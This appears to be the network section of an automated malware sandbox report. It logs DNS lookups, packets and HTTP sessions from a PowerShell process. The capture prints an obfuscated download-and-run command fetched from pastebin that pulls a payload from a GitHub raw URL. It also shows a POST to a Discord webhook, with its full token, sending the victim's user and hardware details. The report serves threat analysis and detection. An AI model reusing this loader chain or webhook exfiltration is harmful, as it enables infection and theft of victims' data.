                                                                        Oct 15, 2024 18:09:20.663938999 CEST4973980192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:20.668806076 CEST8049739185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:20.668878078 CEST4973980192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:20.669075966 CEST4973980192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:20.674068928 CEST8049739185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.271958113 CEST8049739185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.275214911 CEST8049739185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.275923967 CEST4973980192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.275964975 CEST4973980192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.280828953 CEST8049739185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.285388947 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.285480976 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.285561085 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.285835028 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.285871029 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.909436941 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.909504890 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.911761045 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.911794901 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.912069082 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:21.913203955 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:21.955419064 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085310936 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085813999 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085865974 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085867882 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:22.085911036 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085943937 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.085957050 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:22.085968018 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.086004019 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:22.086013079 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.086572886 CEST44349740185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:22.086615086 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:22.106759071 CEST49740443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:25.363483906 CEST4974180192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:25.369067907 CEST8049741172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:25.369157076 CEST4974180192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:25.369854927 CEST4974180192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:25.375189066 CEST8049741172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:25.998574018 CEST8049741172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.000902891 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.000952959 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.001027107 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.003979921 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.003992081 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.110018015 CEST4974180192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.615731001 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.615839005 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.680305958 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.680326939 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.680713892 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.704232931 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.747407913 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.931138039 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.931246996 CEST44349742172.67.19.24192.168.2.4
                                                                        Oct 15, 2024 18:09:26.931309938 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:26.964019060 CEST49742443192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:27.015139103 CEST4974380192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.020054102 CEST8049743185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.020275116 CEST4974380192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.020503044 CEST4974380192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.025784969 CEST8049743185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.657594919 CEST8049743185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.660816908 CEST4974380192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.661761999 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.661799908 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.664448977 CEST8049743185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.664587975 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.664618969 CEST4974380192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.664958000 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:27.664968014 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:27.666462898 CEST8049743185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.344415903 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.344517946 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.347419024 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.347439051 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.347678900 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.348849058 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.391402006 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480001926 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480134010 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480159044 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480184078 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.480211973 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480251074 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.480868101 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480918884 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480952978 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.480972052 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.480990887 CEST44349744185.199.111.133192.168.2.4
                                                                        Oct 15, 2024 18:09:28.481038094 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:28.513587952 CEST49744443192.168.2.4185.199.111.133
                                                                        Oct 15, 2024 18:09:34.472804070 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:34.472846985 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:34.472908020 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:34.473368883 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:34.473380089 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.099651098 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.099754095 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:35.101519108 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:35.101531029 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.101789951 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.102811098 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:35.143465996 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.143523932 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:35.143529892 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.425903082 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.425973892 CEST44349761162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:35.426018000 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:35.429167032 CEST49761443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:40.461672068 CEST4973680192.168.2.4172.67.19.24
                                                                        Oct 15, 2024 18:09:41.230894089 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.230935097 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.231014967 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.231445074 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.231461048 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.839030027 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.839171886 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.840612888 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.840632915 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.841006041 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.842057943 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.887398958 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:41.887463093 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:41.887473106 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:42.107966900 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:42.108563900 CEST44349797162.159.137.232192.168.2.4
                                                                        Oct 15, 2024 18:09:42.108618021 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:42.111063957 CEST49797443192.168.2.4162.159.137.232
                                                                        Oct 15, 2024 18:09:47.151118040 CEST4974180192.168.2.4172.67.19.24

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 15, 2024 18:09:18.249978065 CEST5121453192.168.2.41.1.1.1
                                                                        Oct 15, 2024 18:09:19.195214033 CEST53512141.1.1.1192.168.2.4
                                                                        Oct 15, 2024 18:09:19.341569901 CEST5559553192.168.2.41.1.1.1
                                                                        Oct 15, 2024 18:09:19.348699093 CEST53555951.1.1.1192.168.2.4
                                                                        Oct 15, 2024 18:09:20.654782057 CEST5423953192.168.2.41.1.1.1
                                                                        Oct 15, 2024 18:09:20.662936926 CEST53542391.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 18:09:18.249978065 CEST192.168.2.41.1.1.10x9d1fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.341569901 CEST192.168.2.41.1.1.10x9665Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:20.654782057 CEST192.168.2.41.1.1.10x2d52Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 18:09:19.195214033 CEST1.1.1.1192.168.2.40x9d1fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.195214033 CEST1.1.1.1192.168.2.40x9d1fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.195214033 CEST1.1.1.1192.168.2.40x9d1fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.348699093 CEST1.1.1.1192.168.2.40x9665No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.348699093 CEST1.1.1.1192.168.2.40x9665No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.348699093 CEST1.1.1.1192.168.2.40x9665No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.348699093 CEST1.1.1.1192.168.2.40x9665No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:19.348699093 CEST1.1.1.1192.168.2.40x9665No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:20.662936926 CEST1.1.1.1192.168.2.40x2d52No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:20.662936926 CEST1.1.1.1192.168.2.40x2d52No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:20.662936926 CEST1.1.1.1192.168.2.40x2d52No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 18:09:20.662936926 CEST1.1.1.1192.168.2.40x2d52No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • discord.com
                                                                        • pastebin.com
                                                                        • raw.githubusercontent.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449736172.67.19.2480280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 18:09:19.215377092 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 18:09:19.821805000 CEST472INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 15 Oct 2024 16:09:19 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 167
                                                                        Connection: keep-alive
                                                                        Cache-Control: max-age=3600
                                                                        Expires: Tue, 15 Oct 2024 17:09:19 GMT
                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3112aa7d5e2869-DFW
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449739185.199.111.13380280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 18:09:20.669075966 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 18:09:21.271958113 CEST541INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 16:09:21 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdfw8210162-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729008561.213871,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 16:14:21 GMT
                                                                        Vary: Authorization,Accept-Encoding


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449741172.67.19.24805368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 18:09:25.369854927 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 18:09:25.998574018 CEST472INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 15 Oct 2024 16:09:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 167
                                                                        Connection: keep-alive
                                                                        Cache-Control: max-age=3600
                                                                        Expires: Tue, 15 Oct 2024 17:09:25 GMT
                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3112d0fc6147a6-DFW
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.449743185.199.111.133805368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 18:09:27.020503044 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 18:09:27.657594919 CEST541INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 16:09:27 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdfw8210178-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729008568.597633,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 16:14:27 GMT
                                                                        Vary: Authorization,Accept-Encoding


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449737162.159.137.2324436636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:19 UTC333OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 212
                                                                        Expect: 100-continue
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:20 UTC25INHTTP/1.1 100 Continue
                                                                        2024-10-15 16:09:20 UTC212OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 6a 6f 6e 65 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 72 62 78 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4b 54 59 4e 39 54 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                        Data Ascii: { "content": "**user** has joined - rbx\n----------------------------------\n**GPU:** KTYN9T5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                        2024-10-15 16:09:20 UTC1300INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 16:09:20 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729008561
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IuvgeefU3WOfWLXxU821yY8l2W3D3OVvSTdv29IsTGggJ%2BbSwcGcy9vlwsby%2BxGLvM0XvFVfeiZkBdJg15oGSfWGTXWNn%2BAEVw9AQdRytC82DGFlxVnUTPdXQFBl"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=5ca6535c53572a9fb4740a13c8f20b6b84bf0c49-1729008560; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=5Z5HirTMJiqMah4cuwg2epei3iYHTsgcBLIqq9dn78M-1729008560237-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3112ac5c0f3abf-DFW
                                                                        {"message": "Unknown Webhook", "code": 10015}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449738172.67.19.24443280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:20 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:20 UTC397INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 16:09:20 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1;mode=block
                                                                        cache-control: public, max-age=1801
                                                                        CF-Cache-Status: HIT
                                                                        Age: 679
                                                                        Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3112af5b496b70-DFW
                                                                        2024-10-15 16:09:20 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                        2024-10-15 16:09:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449740185.199.111.133443280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 16:09:21 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 16:09:22 UTC900INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 7508
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 16:09:21 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120130-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 1
